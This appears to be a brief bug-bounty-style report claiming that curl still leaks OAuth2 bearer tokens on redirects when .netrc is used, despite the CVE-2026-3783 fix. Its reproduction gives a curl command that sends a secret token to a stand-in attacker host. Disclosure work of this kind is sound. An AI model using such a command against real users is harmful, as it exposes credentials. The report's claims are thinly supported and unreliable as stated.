Bearer Token Leaked to Attacker via .netrc Despite CVE-2026-3783 Fix

curl versions 8.19.0 and later were meant to fix CVE-2026-3783, which causes OAuth2 bearer tokens to leak on HTTP redirects when the user has a .netrc file configured. However, the vulnerability still exists in the current codebase. VULNERABILITY: When a curl user specifies an OAuth2 bearer token via --oauth2-bearer and also uses the --netrc flag to enable .netrc authentication, curl fails to prevent the bearer token from being sent to redirect targets. AFFECTED VERSIONS: 8.17.0, 8.19.0, 8.19.1-DEV, 8.19.x REPRODUCTION: 1. Create .netrc with attacker domain entry 2. Run: curl --oauth2-bearer 'SECRET_TOKEN' --netrc --location http://redirect-to-attacker.com 3. Bearer token sent to attacker ROOT CAUSE: lib/http.c:825-829 - OR condition bypasses redirect protection IMPACT: OAuth credentials exposed, attacker gains API access ## Impact OAuth credentials exposed allowing attacker to access victim's APIs and data